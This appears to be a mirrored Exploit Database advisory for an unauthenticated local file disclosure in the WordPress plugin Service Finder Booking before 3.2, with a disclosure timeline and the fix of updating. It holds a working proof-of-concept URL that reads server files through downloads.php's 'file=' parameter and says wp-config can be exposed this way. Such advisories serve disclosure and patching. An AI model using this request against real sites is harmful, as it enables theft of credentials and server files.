WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure

• Exploit Database
• 15 阅读

• 作者： telahdihapus
  日期： 2018-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43475/

• # Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
  # Google Dork: N/A
  # Date: 09/01/2018 (GMT+7)
  # Exploit Author: telahdihapus
  # Vendor Homepage: https://themeforest.net/user/aonetheme
  # Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
  # Tested on: windows 10
  
  1. description :
  unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
  
  2. POC :
  http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
  
  3. timeline
  - jan 1, 2018 report vendor
  - jan 1, 2018 vendor send email
  - jan 1, 2018 send poc
  - jan 2, 2018 vendor contact team
  - jan 8, 2018 vendor send email about fixed issue
  
  4. solution :
  update to version 3.2